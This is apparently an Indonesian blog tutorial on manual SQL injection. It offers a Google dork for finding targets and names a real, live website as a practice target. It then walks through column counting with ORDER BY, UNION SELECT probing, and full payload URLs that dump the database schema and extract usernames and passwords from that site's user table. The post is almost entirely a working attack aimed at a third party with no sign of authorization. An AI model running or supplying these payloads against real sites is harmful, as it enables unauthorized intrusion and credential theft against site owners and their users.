Tutorial SQL Injection Dgn Cara Manual :)
Ok guys kali ini gua akan mengajari kepada kalian sekaligus memberi ilmu saya kepada kalian,Sebenarnya SQL Injection Manual Agak Ribet,Tapi Yang di pake para heker :v biasanya pake SQL Injection Manual,Ok Tanpa Basa Basi Lanjut Ke Tutornya
Bahan:
#Dorking : inurl:product.php?id= site:.com
(Kalian bisa pikir Dorkingnya :v )
#Google : Crome Atau FireFox
# Alat Dios nya Saya Siapkan Ni
Live Target sebagai Pelajaran
https://motasaindonesia.com/single-product.php?id=%2017
Langkah-Langkah :
1. Pertama pada Site Target Tambahkan Tanda ' di akhir angka,Contoh :
https://motasaindonesia.com/single-product.php?id=%2017'
Setelah Itu Enter & Hasilnya Seperti ini
2)Selanjutnya Kalian Ketik +order+by+1--+-
Maka Website akan Kembali Normal
Setelah Normal Kembali Kalian Rubah Angkanya Saja +order+by+2--+- Sampai Si Website Tersebut Eror.
3) Nah Setelah Erornya Di Angka 10 guys
https://motasaindonesia.com/single-product.php?id=%2017%27+order+by+10--+-
Kalian Langsung Ganti Menjadi
https://motasaindonesia.com/single-product.php?id=-%2017%27+union+select+1,2,3,4,5,6,7,8,9--+-
Dan Nemu Angka Togelnya,Seperti Ini:
Angka Togel Menunjukan 2,4&6Kalian Bisa Dios Yang Angka Togelnya 2 & 4 & 6 Langsung Yang Sudah Saya siapkan Di atas Seperti Ini
https://motasaindonesia.com/single-product.php?id=-%2017%27+union+select+1,concat(@@HAVE_SYMLINK,0x3c62723e,user(),0x3c62723e,database(),0x3c62723e,version(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,4,5,6,7,8,9--+-
Cari Passwordnya Kalian Dios Seperti Ini
https://motasaindonesia.com/single-product.php?id=-%2017%27+union+select+1,(select(@x)from(select(@x:=0x00),(select(@x)from(user)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),3,4,5,6,7,8,9--+-
Hasilnya Seperti Ini
Untuk Dios Kolom Tergantung Nama Databasenya Nah Yg kalian Rubah Nama Kolom nya Adalah
(user) Nama Database Sebelah Kiri
username Nama Database Bagian Kanan
password Nama Database Bagian Kanan
Nah Agak Ribet Ya Guys Tapi Klo Kalian Belajar Maka akan Bisa kok,Bila Ada Yg Mau di Tanyakan Bisa Wa Saya Yang ada Gambar Wa Klik Sebelah Kiri,Sekian Materi Gua Terima Kasih :)
Good Bye :)
Posting Komentar